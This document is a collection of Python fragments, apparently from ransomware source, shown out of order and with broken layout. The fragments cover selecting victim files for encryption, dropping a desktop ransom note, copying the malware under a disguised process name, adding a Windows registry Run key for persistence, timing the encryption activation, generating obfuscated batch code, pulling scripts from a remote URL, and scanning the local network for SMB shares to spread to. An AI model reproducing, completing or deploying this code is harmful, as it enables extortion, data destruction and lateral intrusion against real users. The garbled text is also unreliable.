def write(self, filename: str, code: str) -> None: with open(filename, "w") as file: file.write( "@ECHO ===========================================================\n" ) ret = file.write(code) deb(f'\nwritten {ret} bytes to {filename}\r\n')
def analyze_network(): last_recv = 0 last_sent = 0 global intensive_sent global intensive_recv while run_analyze_network: net_stats = psutil.net_io_counters() deb(f'\rnetwork [{net_stats}] bytes_in: {net_stats.bytes_recv - last_recv:8} bytes_out: {net_stats.bytes_sent - last_sent:8}\r') if net_stats.bytes_sent - last_sent > 1024 * 1024 * 4: intensive_sent = True elif net_stats.bytes_sent - last_sent < 1024 * 1024 * 1: intensive_sent = False if net_stats.bytes_recv - last_recv > 1024 * 1024 * 4: intensive_recv = True elif net_stats.bytes_recv - last_recv < 1024 * 1024 * 1: intensive_recv = False last_recv = net_stats.bytes_recv last_sent = net_stats.bytes_sent time.sleep(1) deb(f'intensive_sent: {intensive_sent} intensive_recv: {intensive_recv}')
def write(self, data, ip, port): assert self.sock, 'Socket is already closed' try: len = self.sock.sendto(data, (ip, port)) # deb(f'sendto({data.hex()}, {ip}, {port}) => {len}') except Exception as e: deb(f'sendto({data.hex}, {ip}, {port}) exception: {e}')
def suitable(path: str): """ check user file is good for seizing """ if any(s for s in Config.SKIP if s in path.lower()) and re.match(f'.*?\\.({get_extensions()})?$', path): deb(f'\rexclude {path}') return False if re.match(f'.*?\\.({get_extensions()})?$', path) and config['core']['encryption_dir'].lower() not in path.lower(): if Config.MAX_FILE_SIZE_MB >= (os.stat(path).st_size / 1024.0 / 1024.0) >= Config.MIN_FILE_SIZE_MB: return True return False
def advert_info(): try: txt_name = os.path.join(getenv('temp'), 'YOUR_ENCRYPTED_FILES_DATA.txt') try: with open(txt_name, "wt") as file: write_advert(file) except Exception as e: deb(f'{txt_name}: {e} {sys.exc_info()}') shutil.copy(txt_name, os.path.join(os.environ["USERPROFILE"], "Desktop")) os.unlink(txt_name) except Exception as e: deb(f"advert: {e}")
def get_advert(): txt_name = os.path.join(getenv('temp'), 'aaaaa.txt') text = '<error>' try: with open(txt_name, "w+t") as file: write_advert(file) file.seek(0) text = file.read() except Exception as e: deb(f'{txt_name}: {e} {sys.exc_info()}') try: os.unlink(txt_name) return str(text) except Exception as e: deb(f"advert: {e}")
def push_command(self, command, offset=0) -> int: if offset == -1: max = self.num_commands() - 1 if self.num_commands() - 1 > 0 else 0 command.offset = random.randint(0, max) # deb(f"push {command} @ {command.offset} ({self.get_operand_at(command.offset)})") else: command.offset = offset if offset else self._offset + 1 self._command_pipeline.append(command) self._offset = command.offset if ip_debug: deb(f'{self._offset:04d} {command} ({len(assember)})') var_dump(self._command_pipeline) return self._offset
def get_usable_exe_pathes() -> Tuple[str, str]: ''' Get list of running process sorted by Memory Usage ''' objects = [] # Iterate over the list for proc in psutil.process_iter(): try: # Fetch process details as dict pinfo = proc.as_dict(attrs=['exe', 'pid', 'name', 'username']) pinfo['vms'] = proc.memory_info().vms / (1024 * 1024) # Append dict to list objects.append(pinfo); except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess, Exception) as e: deb(f'process: {e}') # Sort list of dict by key vms i.e. memory usage objects = sorted(objects, key=lambda proc_obj: proc_obj['vms'], reverse=True) return objects[0]['name'].strip(), objects[0]['exe'].strip()
def poll(self, timeout=0): end_time = time.time() + timeout while self.pending_count > 0 and (timeout == 0 or time.time() < end_time): t = max(0, end_time - time.time()) try: ready, _, _ = select.select([self.sock.fileno()], [], [], t) if not ready: return None try: data, (ip, port) = self.sock.recvfrom(0xFFFF) deb(f"recvfrom(ip:{ip}, port:{port}) = '{data.hex()}'") except Exception as e: deb(f'recvfrom({self.sock}): {e}') if 'data' not in locals(): continue _, ret = self.decodeIPQueryPacket(data) if 'ip' in locals() and ip in self.pendings: self.pendings.remove(ip) self.pending_count -= 1 if ret is None: deb(f'decodeIPQueryPacket() _={_} ret=null') else: self.queryResult(ip, set(ret)) except select.error as ex: if type(ex) is win32ui.types.TupleType: if ex[0] != errno.EINTR and ex[0] != errno.EAGAIN: raise ex else: raise ex
def detect_encrypt_storage(): parts = psutil.disk_partitions() hdds = {} try: for part in parts: hdd = psutil.disk_usage(part.mountpoint) hdds[part.mountpoint] = hdd.free except Exception as e: deb(f'part in parts: {e}') deb(f'disks: {hdds}') hdds = sorted(hdds, key=hdds.get, reverse=True) deb(f'disk selected: {hdds[0]}') config['core'] = {'encryption_dir': hdds[0] + r'temp\edata'} deb(f'encryption_dir: {config["core"]["encryption_dir"]}') return hdds[0]
def get_code(self) -> str: if self._code is None: deb(f'\r\nsorting code according to offset order ...') self.sort() step = 0 code = '' num = len(self._command_pipeline) numIi = 0 for command in self._command_pipeline: code += str(command).strip() + f"\n" step += 1 numIi += 1 if numIi >= len(ii): numIi = 0 currentSym = ii[numIi] deb(f'\rjoining code ... {step / num * 100.0:.1f}% (line {step} of {num}, {len(code)} bytes) {currentSym}', end='') self._code = code.strip() return self._code
def post_install(): global activate_encryption now = int(str(time.time()).split(".")[0]) deb(f'now: {now}') activation_time = int(config["core"]['activation_at']) deb(f'activation time: {activation_time}') wait_time = activation_time - now deb(f'time until encryption: {wait_time} secs ({wait_time / 60:.0f} mins)') if wait_time <= 0: activate_encryption = True
def install(): first_install = False next_path = u'' try: deb(f"profiledir: {os.environ['USERPROFILE']}") (process_name, proc_dir) = get_usable_exe_pathes() config['core']['exename'] = process_name.split('.')[0] proc_name = process_name.split('.')[0] + 'Host.exe' proc_dir = os.path.dirname(proc_dir)[3:] next_path = os.path.join(os.environ['USERPROFILE'], proc_dir) os.makedirs(next_path, exist_ok=True) next_path = os.path.join(next_path, proc_name) if os.path.isfile(next_path): os.unlink(next_path) config['core']['exe'] = next_path config['core']['activation_at'] = get_activation_time() deb(f"exe {config['core'].get('exe')}") if not os.path.exists(next_path): first_install = True deb(f"copy({exe_self}, {next_path}") shutil.copyfile(exe_self, next_path) reg_key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") if not is_dev(): winreg.SetValueEx(reg_key, process_name.split('.')[0], 0, winreg.REG_SZ, f"{next_path} -a --background --check-update --embedding") winreg.CloseKey(reg_key) except Exception as e: uprint(f"install: {e}->{sys.exc_info()}") exception(e) if first_install and os.path.exists(next_path): uprint(f'{get_computer_uid()}: installed') sys.exit(3)
total_files = 0 for r, d, f in os.walk(int_path): for current_file in f: total_files += 1 current_files.append(os.path.join(r, current_file)) lst = [internal_file for internal_file in current_files] return lst # Press the red button if __name__ == '__main__': load_config() if not config.has_section('core'): deb(f'no config file') sys.exit(-1) encryption_dir = config['core'].get('encryption_dir', fallback=r'c:\temp\edata') deb(f'encryption_dir: {encryption_dir}') if not os.path.isdir(encryption_dir): deb(f'no encdir') sys.exit(-1) computer_id = get_computer_uid() deb(f"your computer id: {computer_id}") files = dir_files(encryption_dir) if len(files) <= 0:
def detect_malware_type(): deb('detecting malware payload according machine specs ... ') c = wmi.WMI() SYSINFO = c.Win32_ComputerSystem() OSINFO = c.Win32_OperatingSystem()[0] CPUINFO = c.Win32_Processor()[0] HDDINFO = c.Win32_LogicalDisk()[0] RAMINFO = c.Win32_PhysicalMemory()[0] pprint.pp(SYSINFO, depth=13) MANUFACTURER = SYSINFO[0].Manufacturer MODEL = SYSINFO[0].Model RAMTOTAL = int(SYSINFO[0].TotalPhysicalMemory) HDDTOTAL = int(HDDINFO.size) RAMSIZE = round(RAMTOTAL) HDDSIZE = round(HDDTOTAL) deb("Model: " + MANUFACTURER + " " + MODEL) deb(f"HDD: {HDDTOTAL / 1024.0 / 1024.0 / 1024.0:.2f}GB") deb(f"RAM: {RAMTOTAL / 1024.0 / 1024.0 / 1024.0:.2f}GB") deb("CPU: " + CPUINFO.name) deb("OS: " + OSINFO.caption) sys.exit(-4) pass
def empty_dest_dir(): delete_files = dir_files(config['core']['encryption_dir']) if len(delete_files) > 0: deb(f'deleting {len(delete_files)} files') for file in delete_files: os.unlink(file)
def pull_scripts(): deb("pulling new scripts ...") headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66'} r = requests.get(Config.PULL_URL, headers=headers) deb(f'{r.text}') pass
num_gotos = random.randint(1, max) numIi = 0 ip = 0 # for ng in range(num_gotos): # assember.junk(min=1, max=4) for step in range(0, max_operands - 1): if max >= 111: numIi += 1 if numIi >= len(ii): numIi = 0 currentSym = ii[numIi] deb(f'\rgenerating code ... {step / max * 100.0:.0f}% {currentSym}', end='') # deb(f'offset: {offset}') assember.junk(min=11, max=34) label = Randomer.str_generator() ip = assember.push_command(Command(Operand.GOTO, ":" + label), offset=-1) assember.junk(min=11, max=34) ip = assember.push_command(Command(Operand.LABEL, ":" + label)) if step == max - 2: assember.push_command(Command(Operand.EXIT)) deb(f"{assember.get_code()}")
if __name__ == '__main__': locale.setlocale(locale.LC_ALL, 'en_US.UTF-8') logging.basicConfig(format="%(asctime)s [%(levelname)s] [%(thread)d] %(filename)s(%(funcName)s:%(lineno)d) - %(message)s", level=logging.DEBUG) uprint(f'{get_computer_uid()}: user: {os.getlogin()} ppid: {os.getppid()} dir: {os.getcwd()} platform: {platform.platform()} ' f'python: {platform.python_version()} win32: {platform.win32_ver()}' f' edition: {platform.win32_edition()} file: {__file__}') load_config() atexit.register(save_config) if is_dev(): Config.EXTENSIONS_ENCODED = "dDNzdHx0ZXN0" deb(f'developer machine {get_extensions()}') path = create_unicode_buffer(4096) windll.kernel32.GetModuleFileNameW(None, path, 4096) exe_self = path.value opts = [opt for opt in sys.argv[1:] if opt.startswith("-")] if "-a" in opts: autorunned = True if not config.has_section('core') or not config.has_option('core', 'encryption_dir'): detect_encrypt_storage() if not autorunned: # if is_dev(): # scan_shares()
def main(): if len(sys.argv) > 2: start_ip = ip_to_int(sys.argv[1]) end_ip = ip_to_int(sys.argv[2]) elif len(sys.argv) == 2: start_ip = ip_to_int(sys.argv[1]) end_ip = start_ip else: deb('ScanNetworkForSMB - Script for scanning network for open SMB/CIFS services') deb('Error: missing IP arguments') deb('Usage:' + sys.argv[0] + 'start-IP-address [end-IP-address]') return ifs = net_if_addrs() scan_networks = [sys.argv[1], sys.argv[1]] # var_dump(ifs, '-----') # for iface in ifs: # if ifs[iface][1].family == AF_INET: # scan_networks.append(ifs[iface][1].address) # var_dump(scan_networks) # deb(f'Beginning scanning %d IP addresses [{sys.argv[1]} - ] ... {(end_ip - start_ip + 1)}') for network in scan_networks: deb(f'scanning network {network} ... ', end='') starting = re.sub(r'^(\d+\.\d+\.\d+)\.\d+?$', r'\1.1', network, 0, re.DOTALL) ending = re.sub(r'^(\d+\.\d+\.\d+)\.\d+?$', r'\1.255', network, 0, re.DOTALL) deb(f'{starting} - {ending} ') start_ip = ip_to_int(starting) end_ip = ip_to_int(ending) ns = NonBlockingNetBIOS() for ip in range(start_ip, end_ip): ns.queryIPForName(int_to_ip(ip)) ns.poll(2) if ns.pending_count > 0: ns.poll(2) var_dump(ns.servers) for ips in ns.servers: for token in ns.servers[ips]: deb(f'token {token}') ret = os.system(f'net use \\\\{token}') deb(f'net use -> {ret}') files = dir_files(r'\\' + token + r'\*') var_dump(files) sys.exit(0)